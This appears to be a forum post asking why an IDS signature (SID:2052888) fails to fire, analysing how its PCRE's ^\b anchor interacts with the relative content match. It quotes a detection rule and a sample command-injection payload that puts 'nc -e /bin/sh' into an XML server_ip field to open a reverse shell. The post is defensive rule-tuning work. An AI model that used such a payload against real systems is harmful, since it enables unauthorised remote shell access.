Hi,
Could you help me understand the pcre in SID:2052888?
Just looking at the content matches for the malicious XML payload, which are:
content:“<server_ip”; nocase; fast_pattern; pcre:“/^\b[^>]*>[^\x3b<]+\x3b[^<]+</server_ip>/Rsi”;
Which should detect the demonstrated payload:
<server_ip>127.0.0.1; nc -e /bin/sh 10.0.40.83 443; </server_ip>
However, I am unable to trigger the alert with a test pcap. I think it’s because the pcre is relative to the content match “<server_ip”, leaving the detection cursor at the beginning of “>127.0.0.1; nc -e /bin/sh 10.0.40.83 443; </server_ip>” for the pcre, which can only start if there’s a string that begins with a word character (^\b), which it cannot because the first character it comes across is a “>”.
This is actually the first time I have seen ^\b, I may misunderstand its intent. I am able to get the rule to trigger by changing the first content match, to “<server_i” for example, to leave a word character at the start for the pcre match.
Thank you.